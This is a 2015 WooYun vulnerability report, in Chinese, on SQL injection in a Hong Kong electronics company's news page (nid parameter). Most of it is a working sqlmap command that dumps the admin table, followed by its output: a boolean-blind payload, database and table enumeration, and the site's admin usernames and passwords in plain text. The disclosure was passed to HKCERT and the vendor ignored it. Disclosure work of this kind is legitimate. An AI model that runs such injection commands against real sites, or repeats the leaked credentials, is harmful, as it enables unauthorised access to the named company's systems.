当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0157306

漏洞标题:鴻星國際電子(香港)有限公司主站存在SQL注射漏洞(admin密码)(香港地區)

相关厂商:鴻星國際電子(香港)有限公司

漏洞作者: 路人甲

提交时间:2015-12-03 11:24

修复时间:2015-12-08 11:26

公开时间:2015-12-08 11:26

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-03: 细节已通知厂商并且等待厂商处理中
2015-12-08: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

本公司成立于1997年,現時為較具規模的電子元器件供應商之一。產品被廣泛應用于數碼產品(MP3、MP4、數碼相機等)、藍牙耳機,手機,、電話機、對講機、PDA、LCD、筆記本電腦、DVB-T、汽車電子、電視機、通訊設備和終端等領域。其產品主要有︰HC-49S、HC-49SMD、HC-49U、OSC、VCXO、TCXO SMD.表晶.柱晶 UM-1、UM-5及插件排阻.電阻電容等。
本公司本著以“優質的服務”、“可靠的質量”、“不斷的創新”爭取做到客戶100%的滿意為方針。

详细说明:

地址:http://**.**.**.**/gb/news_view.php?nid=86

$ python sqlmap.py -u "http://**.**.**.**/gb/news_view.php?nid=86" -p nid --technique=B --random-agent --batch  --no-cast -D hosonic -T hosonic_manage -C user_name,pass --dump


Database: hosonic
Table: hosonic_manage
[2 entries]
+-----------+---------+
| user_name | pass    |
+-----------+---------+
| admin     | admin   |
| admin     | hosonic |
+-----------+---------+

漏洞证明:

---
Parameter: nid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: nid=86 AND 5331=5331
---
web application technology: Apache, PHP 5.2.17
back-end DBMS: MySQL >= 5.0.0
current user:    'hosonic@localhost'
current user is DBA:    False
database management system users [1]:
[*] 'hosonic'@'localhost'
Database: hosonic
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| hosonic_news                          | 59      |
| hosonic_products                      | 49      |
| hosonic_type                          | 9       |
| hosonic_message                       | 6       |
| hosonic_n_type                        | 5       |
| hosonic_manage                        | 2       |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| COLUMNS                               | 253     |
| COLLATION_CHARACTER_SET_APPLICABILITY | 126     |
| COLLATIONS                            | 126     |
| CHARACTER_SETS                        | 36      |
| TABLES                                | 23      |
| SCHEMA_PRIVILEGES                     | 16      |
| KEY_COLUMN_USAGE                      | 6       |
| STATISTICS                            | 6       |
| TABLE_CONSTRAINTS                     | 6       |
| SCHEMATA                              | 2       |
| USER_PRIVILEGES                       | 1       |
+---------------------------------------+---------+
columns LIKE 'pass' were found in the following databases:
Database: hosonic
Table: hosonic_manage
[1 column]
+--------+
| Column |
+--------+
| pass   |
+--------+
Database: hosonic
Table: hosonic_manage
[2 entries]
+---------+
| pass    |
+---------+
| admin   |
| hosonic |
+---------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: nid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: nid=86 AND 5331=5331
---
web application technology: Apache, PHP 5.2.17
back-end DBMS: MySQL 5
Database: hosonic
Table: hosonic_manage
[2 entries]
+-----------+---------+
| user_name | pass    |
+-----------+---------+
| admin     | admin   |
| admin     | hosonic |
+-----------+---------+

修复方案:

上WAF。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-12-08 11:26

厂商回复:

最新状态:

暂无